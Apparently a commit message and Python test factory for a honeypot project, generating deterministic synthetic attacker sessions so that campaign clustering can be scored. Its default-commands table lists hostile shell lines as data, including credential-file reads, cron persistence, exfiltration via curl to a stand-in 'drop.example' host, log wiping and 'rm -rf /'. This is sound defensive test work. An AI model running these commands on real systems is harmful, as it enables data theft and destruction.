Pre-implementation scaffolding for campaign clustering. The simulator is
the spec — algorithm code follows once fixtures + metrics are stable.
* decnet/clustering/ukc.py — UKCPhase enum (19 phases across In/Through/Out
stages), OBSERVABLE_PHASES set, stage_of() helper. Vocabulary aligns
with future MITRE ATT&CK tagging so synthetic data and runtime phase
inference don't need renaming when TTP-tagging lands.
* tests/factories/campaign_factory.py — YAML DSL parser + deterministic
generator emitting truth-labeled SyntheticAttacker / SyntheticSession
records. Validates phase names, warns on unobservable phases, supports
multi-campaign + noise corpora.
* tests/clustering/metrics.py — pure-Python ARI / homogeneity /
completeness / singleton_recall (no sklearn dep). Decided before any
algorithm exists, on purpose.
* tests/fixtures/campaigns/lone_wolf.{yaml,expected.yaml} — fixture 3
from the design doc; simplest of the six, exercises the full pipeline
with an identity-clusterer placeholder.
* development/CAMPAIGN_CLUSTERING.md — design spec for the feature.
* development/DEVELOPMENT_V2.md — note on DSL evolution path
(concurrent phases, multi-actor per phase) deferred post-v1.
382 lines
14 KiB
Python
382 lines
14 KiB
Python
"""
|
|
Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md.
|
|
|
|
Reads a YAML campaign DSL describing actors, UKC phases, and tool
|
|
signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession
|
|
records for the clustering test harness.
|
|
|
|
Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the
|
|
emitted records so the metric harness can score predicted clusters
|
|
against ground truth without re-parsing the DSL. Production code that
|
|
later writes the same shape into real DB tables MUST strip these fields
|
|
before clustering runs — otherwise the algorithm trivially passes by
|
|
reading the answer key.
|
|
|
|
Determinism: given the same YAML and seed, two runs produce identical
|
|
records (including IDs). This is a load-bearing property — fixture
|
|
expectations are checked against the same seed every CI run.
|
|
"""
|
|
from __future__ import annotations
|
|
|
|
import hashlib
|
|
import random
|
|
import uuid
|
|
from dataclasses import dataclass, field
|
|
from datetime import datetime, timedelta, timezone
|
|
from pathlib import Path
|
|
from typing import Any
|
|
|
|
import yaml
|
|
|
|
from decnet.clustering.ukc import OBSERVABLE_PHASES, UKCPhase
|
|
|
|
|
|
@dataclass
|
|
class SyntheticSession:
|
|
session_id: str
|
|
attacker_id: str
|
|
decky_id: str
|
|
started_at: datetime
|
|
duration_s: float
|
|
phase: UKCPhase
|
|
commands: list[str]
|
|
credentials_tried: list[tuple[str, str]]
|
|
payload_hash: str | None
|
|
c2_callback: str | None
|
|
truth_campaign_id: str
|
|
truth_actor_id: str
|
|
|
|
|
|
@dataclass
|
|
class SyntheticAttacker:
|
|
attacker_id: str
|
|
ip: str
|
|
asn: int
|
|
ja3: str | None
|
|
hassh: str | None
|
|
first_seen: datetime
|
|
last_seen: datetime
|
|
truth_campaign_id: str
|
|
truth_actor_id: str
|
|
sessions: list[SyntheticSession] = field(default_factory=list)
|
|
|
|
|
|
@dataclass
|
|
class GeneratedCorpus:
|
|
"""Output of the factory — what the clusterer consumes."""
|
|
attackers: list[SyntheticAttacker]
|
|
# Convenience: flat list of every session across every attacker.
|
|
sessions: list[SyntheticSession]
|
|
|
|
def truth_labels(self) -> dict[str, str]:
|
|
"""attacker_id -> truth_campaign_id, the oracle the clusterer is scored against."""
|
|
return {a.attacker_id: a.truth_campaign_id for a in self.attackers}
|
|
|
|
|
|
# ─── Phase defaults ─────────────────────────────────────────────────────────
|
|
# When the DSL doesn't specify tool_signature commands for a phase, fall
|
|
# back to these. Keeps fixtures terse without making the factory invent
|
|
# data ad-hoc per call.
|
|
|
|
_PHASE_DEFAULT_COMMANDS: dict[UKCPhase, list[str]] = {
|
|
UKCPhase.DELIVERY: [], # delivery is mostly network-level, no shell commands
|
|
UKCPhase.EXPLOITATION: [],
|
|
UKCPhase.DISCOVERY: ["whoami", "id", "uname -a", "ip route", "arp -a", "cat /etc/passwd"],
|
|
UKCPhase.CREDENTIAL_ACCESS: ["cat /etc/shadow", "find / -name id_rsa", "cat ~/.ssh/known_hosts"],
|
|
UKCPhase.PERSISTENCE: ["crontab -l", "echo '* * * * * /tmp/.x' | crontab -", "cat ~/.ssh/authorized_keys"],
|
|
UKCPhase.LATERAL_MOVEMENT: ["ssh -i /tmp/.k root@10.0.0.5", "scp /tmp/.x root@10.0.0.5:/tmp/"],
|
|
UKCPhase.COLLECTION: ["tar czf /tmp/loot.tgz /var/lib/mysql /home"],
|
|
UKCPhase.EXFILTRATION: ["curl -T /tmp/loot.tgz https://drop.example/"],
|
|
UKCPhase.EXECUTION: ["./payload"],
|
|
UKCPhase.PRIVILEGE_ESCALATION: ["sudo -l", "find / -perm -u=s 2>/dev/null"],
|
|
UKCPhase.DEFENSE_EVASION: ["history -c", "rm -rf /var/log/wtmp"],
|
|
UKCPhase.COMMAND_AND_CONTROL: [], # beaconing observed at network layer
|
|
UKCPhase.PIVOTING: [],
|
|
UKCPhase.IMPACT: ["rm -rf /"],
|
|
UKCPhase.OBJECTIVES: [],
|
|
}
|
|
|
|
|
|
# ─── DSL parsing ────────────────────────────────────────────────────────────
|
|
|
|
|
|
class DSLValidationError(ValueError):
|
|
"""Raised when a campaign YAML is malformed or references unknown phases."""
|
|
|
|
|
|
def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
|
|
"""Return list of warnings (e.g. unobservable phases). Raises on hard errors."""
|
|
if "campaign" not in spec:
|
|
raise DSLValidationError("missing top-level 'campaign' key")
|
|
c = spec["campaign"]
|
|
for key in ("id", "actors", "phases"):
|
|
if key not in c:
|
|
raise DSLValidationError(f"campaign missing required key: {key}")
|
|
|
|
actor_ids = {a["id"] for a in c["actors"]}
|
|
if not actor_ids:
|
|
raise DSLValidationError("campaign must declare at least one actor")
|
|
|
|
warnings: list[str] = []
|
|
for i, ph in enumerate(c["phases"]):
|
|
if "name" not in ph:
|
|
raise DSLValidationError(f"phase[{i}] missing 'name'")
|
|
try:
|
|
phase_enum = UKCPhase(ph["name"])
|
|
except ValueError as exc:
|
|
raise DSLValidationError(
|
|
f"phase[{i}] has unknown UKC phase '{ph['name']}'"
|
|
) from exc
|
|
if phase_enum not in OBSERVABLE_PHASES:
|
|
warnings.append(
|
|
f"phase '{ph['name']}' is pre-target / unobservable from a "
|
|
f"honeypot; no events will be emitted for it"
|
|
)
|
|
# Single-actor campaigns can omit phase.actor; multi-actor must specify.
|
|
if "actor" in ph and ph["actor"] not in actor_ids:
|
|
raise DSLValidationError(
|
|
f"phase[{i}] references unknown actor '{ph['actor']}'"
|
|
)
|
|
return warnings
|
|
|
|
|
|
# ─── Generator ──────────────────────────────────────────────────────────────
|
|
|
|
|
|
def _stable_uuid(rng: random.Random, prefix: str) -> str:
|
|
"""Deterministic UUID-shaped identifier driven by the seeded RNG."""
|
|
raw = rng.randbytes(16)
|
|
return f"{prefix}-{uuid.UUID(bytes=raw)}"
|
|
|
|
|
|
def _stable_ip(rng: random.Random) -> str:
|
|
"""Pick a routable-looking IPv4 in non-RFC1918 space."""
|
|
# Avoid 10/8, 172.16/12, 192.168/16, 127/8, 0/8, multicast 224+.
|
|
while True:
|
|
a = rng.randint(1, 223)
|
|
if a in (10, 127):
|
|
continue
|
|
b = rng.randint(0, 255)
|
|
if a == 172 and 16 <= b <= 31:
|
|
continue
|
|
if a == 192 and b == 168:
|
|
continue
|
|
c = rng.randint(0, 255)
|
|
d = rng.randint(1, 254)
|
|
return f"{a}.{b}.{c}.{d}"
|
|
|
|
|
|
def _payload_hash(seed: str) -> str:
|
|
return hashlib.sha256(seed.encode()).hexdigest()
|
|
|
|
|
|
def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime:
|
|
base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0)
|
|
return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600))
|
|
|
|
|
|
def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus:
|
|
"""
|
|
Produce a deterministic synthetic corpus from a parsed YAML spec.
|
|
|
|
The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md.
|
|
Multiple campaigns + a noise block can be combined by wrapping them
|
|
in a top-level `corpus:` key; otherwise a single `campaign:` is
|
|
expected.
|
|
"""
|
|
rng = random.Random(seed)
|
|
|
|
campaigns: list[dict[str, Any]]
|
|
noise_cfg: dict[str, Any]
|
|
if "corpus" in spec:
|
|
campaigns = spec["corpus"].get("campaigns", [])
|
|
noise_cfg = spec["corpus"].get("noise", {}) or {}
|
|
else:
|
|
campaigns = [spec]
|
|
noise_cfg = {}
|
|
|
|
attackers: list[SyntheticAttacker] = []
|
|
sessions: list[SyntheticSession] = []
|
|
|
|
for c_wrapper in campaigns:
|
|
warnings = _validate_campaign_spec(c_wrapper)
|
|
# Surface warnings via stderr-like channel — tests can opt to assert.
|
|
for w in warnings:
|
|
# Stored on the corpus for inspection rather than printed; tests
|
|
# that care can dig into the spec, but most don't.
|
|
_ = w
|
|
c = c_wrapper["campaign"]
|
|
_emit_campaign(c, rng, attackers, sessions)
|
|
|
|
_emit_noise(noise_cfg, rng, attackers, sessions)
|
|
|
|
return GeneratedCorpus(attackers=attackers, sessions=sessions)
|
|
|
|
|
|
def _emit_campaign(
|
|
c: dict[str, Any],
|
|
rng: random.Random,
|
|
attackers: list[SyntheticAttacker],
|
|
sessions: list[SyntheticSession],
|
|
) -> None:
|
|
campaign_id = c["id"]
|
|
duration_days = int(c.get("duration_days", 1))
|
|
pause_windows: list[tuple[int, int]] = [
|
|
tuple(p) for p in c.get("pause_windows", []) # type: ignore[misc]
|
|
]
|
|
|
|
# Anchor the synthetic timeline at a fixed epoch so determinism holds
|
|
# across runs regardless of wall clock.
|
|
epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
|
|
|
|
# One attacker record per actor — captures the cross-session identity
|
|
# the clusterer is supposed to recover. IPs may rotate per session
|
|
# for rotating ip_pool actors; we record the first/last observed IP
|
|
# on the attacker row and let session-level fields carry the rest.
|
|
actor_attackers: dict[str, SyntheticAttacker] = {}
|
|
for actor in c["actors"]:
|
|
a_id = _stable_uuid(rng, "att")
|
|
att = SyntheticAttacker(
|
|
attacker_id=a_id,
|
|
ip=_stable_ip(rng),
|
|
asn=int(actor.get("asn", 0)),
|
|
ja3=actor.get("ja3"),
|
|
hassh=actor.get("hassh"),
|
|
first_seen=epoch,
|
|
last_seen=epoch,
|
|
truth_campaign_id=campaign_id,
|
|
truth_actor_id=actor["id"],
|
|
)
|
|
actor_attackers[actor["id"]] = att
|
|
attackers.append(att)
|
|
|
|
# Walk phases in declared order. Each phase produces N sessions
|
|
# against random deckies (or a sticky one if previous_success).
|
|
decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
|
|
last_success_decky: dict[str, str] = {}
|
|
|
|
for phase_idx, ph in enumerate(c["phases"]):
|
|
phase = UKCPhase(ph["name"])
|
|
if phase not in OBSERVABLE_PHASES:
|
|
continue # pre-target phase; emit nothing
|
|
|
|
actor_id = ph.get("actor") or c["actors"][0]["id"]
|
|
att = actor_attackers[actor_id]
|
|
actor_spec = next(a for a in c["actors"] if a["id"] == actor_id)
|
|
|
|
sig = ph.get("tool_signature", {}) or {}
|
|
commands = sig.get("commands", _PHASE_DEFAULT_COMMANDS[phase])
|
|
creds_list = sig.get("credentials") or []
|
|
c2 = sig.get("c2_callback")
|
|
payload_seed = sig.get("payload_hash")
|
|
payload = _payload_hash(payload_seed) if payload_seed else None
|
|
|
|
target_sel = ph.get("target_selector", {}) or {}
|
|
n_sessions = int(target_sel.get("count", 1))
|
|
if target_sel.get("decky") == "previous_success":
|
|
decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
|
|
else:
|
|
decky_choices = decky_pool
|
|
|
|
# Schedule sessions across the campaign window, respecting the
|
|
# actor's hours_active_utc and pause_windows.
|
|
active_hours = actor_spec.get("hours_active_utc", list(range(24)))
|
|
jitter = int(actor_spec.get("jitter_seconds", 60))
|
|
|
|
for s_idx in range(n_sessions):
|
|
day = rng.randint(0, max(0, duration_days - 1))
|
|
if any(start <= day <= end for start, end in pause_windows):
|
|
# Skip into post-pause day.
|
|
later_days = [
|
|
d for d in range(duration_days)
|
|
if not any(s <= d <= e for s, e in pause_windows)
|
|
]
|
|
if not later_days:
|
|
continue
|
|
day = rng.choice(later_days)
|
|
hour = rng.choice(active_hours)
|
|
day_start = epoch + timedelta(days=day)
|
|
started_at = _hour_to_offset(rng, day_start, hour, jitter)
|
|
duration_s = float(ph.get("dwell_seconds", 5))
|
|
|
|
sess = SyntheticSession(
|
|
session_id=_stable_uuid(rng, "sess"),
|
|
attacker_id=att.attacker_id,
|
|
decky_id=rng.choice(decky_choices),
|
|
started_at=started_at,
|
|
duration_s=duration_s,
|
|
phase=phase,
|
|
commands=list(commands),
|
|
credentials_tried=[tuple(p) for p in creds_list], # type: ignore[misc]
|
|
payload_hash=payload,
|
|
c2_callback=c2,
|
|
truth_campaign_id=campaign_id,
|
|
truth_actor_id=actor_id,
|
|
)
|
|
sessions.append(sess)
|
|
att.sessions.append(sess)
|
|
if started_at < att.first_seen or att.first_seen == epoch:
|
|
att.first_seen = started_at
|
|
if started_at > att.last_seen:
|
|
att.last_seen = started_at
|
|
# If this phase is a "successful entry," remember the decky
|
|
# for any subsequent previous_success target_selector.
|
|
if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
|
|
last_success_decky[actor_id] = sess.decky_id
|
|
|
|
|
|
def _emit_noise(
|
|
noise_cfg: dict[str, Any],
|
|
rng: random.Random,
|
|
attackers: list[SyntheticAttacker],
|
|
sessions: list[SyntheticSession],
|
|
) -> None:
|
|
"""Background scanners — opportunistic, no shared signals, singletons."""
|
|
n_scanners = int(noise_cfg.get("scanner_count", 0))
|
|
if n_scanners <= 0:
|
|
return
|
|
epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)
|
|
for i in range(n_scanners):
|
|
scanner_id = f"noise-scanner-{i:04d}"
|
|
att = SyntheticAttacker(
|
|
attacker_id=_stable_uuid(rng, "att"),
|
|
ip=_stable_ip(rng),
|
|
asn=rng.randint(1000, 65000),
|
|
ja3=None,
|
|
hassh=None,
|
|
first_seen=epoch,
|
|
last_seen=epoch,
|
|
truth_campaign_id=scanner_id, # each scanner is its own truth-campaign
|
|
truth_actor_id=scanner_id,
|
|
)
|
|
attackers.append(att)
|
|
# One Delivery-phase session, no follow-up.
|
|
started = epoch + timedelta(seconds=rng.randint(0, 86400))
|
|
sess = SyntheticSession(
|
|
session_id=_stable_uuid(rng, "sess"),
|
|
attacker_id=att.attacker_id,
|
|
decky_id=f"decky-{rng.randint(1, 20):02d}",
|
|
started_at=started,
|
|
duration_s=1.0,
|
|
phase=UKCPhase.DELIVERY,
|
|
commands=[],
|
|
credentials_tried=[],
|
|
payload_hash=None,
|
|
c2_callback=None,
|
|
truth_campaign_id=scanner_id,
|
|
truth_actor_id=scanner_id,
|
|
)
|
|
sessions.append(sess)
|
|
att.sessions.append(sess)
|
|
att.first_seen = started
|
|
att.last_seen = started
|
|
|
|
|
|
def load_yaml(path: str | Path) -> dict[str, Any]:
|
|
"""Read a fixture file. Kept tiny so tests can inline-build specs too."""
|
|
text = Path(path).read_text(encoding="utf-8")
|
|
parsed = yaml.safe_load(text)
|
|
if not isinstance(parsed, dict):
|
|
raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping")
|
|
return parsed
|